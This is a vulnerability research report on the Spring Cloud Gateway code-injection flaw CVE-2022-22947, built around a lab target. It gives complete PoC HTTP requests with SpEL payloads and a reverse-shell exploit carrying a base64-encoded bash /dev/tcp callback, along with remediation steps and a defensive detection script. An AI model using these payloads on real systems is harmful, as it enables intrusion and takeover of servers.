1.1 Vulnerability Information Table
| Item | Details |
|---|---|
| Vulnerability name | Spring Cloud Gateway remote code execution vulnerability |
| Release date | 2022-03-01 |
| Vulnerability ID | CVE-2022-22947 |
| Threat type | Code execution vulnerability |
| Severity | High |
| Affected versions | 3.1.0; 3.0.0 to 3.0.6; versions before 3.0.0 |
| Description | Product: Spring Cloud Gateway is an API gateway built on Spring Framework and Spring Boot, intended to give microservice architectures a simple, effective and unified way to manage API routing. Overview: the Spring Cloud Gateway Actuator endpoint is flawed; when a user enables and exposes the unsecured Gateway Actuator endpoint, applications using Spring Cloud Gateway are vulnerable to code injection. Impact: an attacker can exploit this vulnerability to execute arbitrary malicious code on the target server and obtain system privileges. |
| Fingerprint | Common port/protocol: HTTP. Key paths: POST and GET requests to /actuator/gateway/routes/ and /actuator/gateway/refresh |
| Verification and exploitation | POC: CVE-2022-22947.py; EXP: CVE-2022-22947.py |
| Remediation | Official fix: the vendor has released a security patch and new versions that fix this vulnerability; affected users should update as soon as possible. Official download link: https://spring.io/blog/2022/02/18/spring-cloud-2021-0-1-has-been-released Temporary mitigations: 1. If the business does not need the Gateway actuator endpoint, disable it by setting management.endpoint.gateway.enabled: false in the configuration file. 2. If actuator is required, protect it with Spring Security; see the official guide: https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security |
| References | Security advisory: https://tanzu.vmware.com/security/cve-2022-22947 Patch: https://spring.io/blog/2022/02/18/spring-cloud-2021-0-1-has-been-released |
2.1 Setting Up the Vulnerable Target
2.1.1 Third-party integrated environment
1. Install the vulhub environment:
git clone https://github.com/vulhub/vulhub.git
2. Switch to the spring directory and start the target environment:
docker-compose up -d
If the following page appears when you visit the site, the vulnerable environment was installed successfully:
http://192.168.111.128:8080
2.2 POC Verification
Verification steps:
1. Send a request that adds a route containing a malicious SpEL expression:

POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.111.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 325

{
  "id": "test",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

2. Send a request that refreshes the route just added:

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.111.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 329

3. Send a request to view the execution result:

GET /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.111.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

4. Delete the route:

DELETE /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.111.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

5. Finally, refresh the routes once more:

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.111.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 329
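As a defender's complement to the procedure above, here is an added example that is not part of the original report or of the CVE-2022-22947.py tool it describes. The first function replays the attack sequence from the detection side: over constructed access-log lines (the log format and client addresses are assumptions) it flags a client that creates a route under /actuator/gateway/routes/ and then calls /actuator/gateway/refresh within a short window. The second inspects a route definition for SpEL `#{` templates inside filter or predicate args, which a legitimate route definition does not carry.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (assumed format, not from the report):
# <client ip> - - [<time>] "<method> <path> HTTP/1.1" <status>
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2022:10:00:00 +0000] "GET /actuator/health HTTP/1.1" 200
10.0.0.9 - - [01/Mar/2022:10:00:01 +0000] "POST /actuator/gateway/routes/test HTTP/1.1" 201
10.0.0.9 - - [01/Mar/2022:10:00:02 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200
10.0.0.9 - - [01/Mar/2022:10:00:03 +0000] "GET /actuator/gateway/routes/test HTTP/1.1" 200
10.0.0.7 - - [01/Mar/2022:12:00:00 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ROUTE_RE = re.compile(r"^/actuator/gateway/routes/[^/?]+$")  # route create/update path
REFRESH_PATH = "/actuator/gateway/refresh"
SPEL_RE = re.compile(r"#\{")  # start of a SpEL template expression


def find_route_then_refresh(log_text, window_seconds=300):
    """Return (ip, route_path, refresh_time) for every client that creates a
    route via POST/PUT and then triggers a refresh within the window."""
    pending = {}  # ip -> (route_path, timestamp of the route creation)
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m["ip"], m["method"], m["path"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if method in ("POST", "PUT") and ROUTE_RE.match(path):
            pending[ip] = (path, ts)
        elif method == "POST" and path == REFRESH_PATH and ip in pending:
            route_path, t0 = pending.pop(ip)
            if ts - t0 <= timedelta(seconds=window_seconds):
                alerts.append((ip, route_path, ts.isoformat()))
    return alerts


def spel_in_route_definition(body):
    """Return '<kind>.<name>.<arg>' for each filter/predicate arg in a route
    JSON body whose value contains a SpEL template; empty for a clean route."""
    route = json.loads(body)
    hits = []
    for kind in ("filters", "predicates"):
        for entry in route.get(kind, []):
            for key, value in entry.get("args", {}).items():
                if isinstance(value, str) and SPEL_RE.search(value):
                    hits.append(f"{kind}.{entry.get('name')}.{key}")
    return hits
```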
2.3 Verification with the Integrated Tool
1. Tool name: CVE-2022-22947.py
2. Usage
Help: the -h flag
Single-target check: python3 CVE-2022-22947.py -u http://192.168.111.128:8080
Batch check: python3 CVE-2022-22947.py -f url.txt
3.1 Manual Exploitation
3.1.1 Reverse shell
(Access is obtained by way of a reverse shell.)
Run the reverse-shell exp in the parameter, with the attacker machine listening on port 9090:

POST /actuator/gateway/routes/shell HTTP/1.1
Host: 192.168.111.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 399

{
  "id": "shell",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjUuMTMvOTA5MCAwPiYx}|{base64,-d}|{bash,-i}").getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

2. Refreshing the routes yields the shell.
Reverse shell obtained successfully:
3.2 Exploitation with the Integrated Tool
1. Vulnerability detection
2. Reverse shell
Run the following command:
python3 CVE-2022-22947.py -u http://192.168.111.128:8080 -l 10.1.5.13:9090
The attacker machine receives the shell:
4.1 Fix 1: Temporary Mitigation
4.2 Fix 2: Standard Solution
Upgrade as officially recommended:
https://spring.io/blog/2022/02/18/spring-cloud-2021-0-1-has-been-released
PS: reply "斗哥YYDS" in the official account backend to obtain the detection tool.
Originally published by the WeChat official account 国科漏斗社区: Spring Cloud Gateway Remote Code Execution Vulnerability Research Report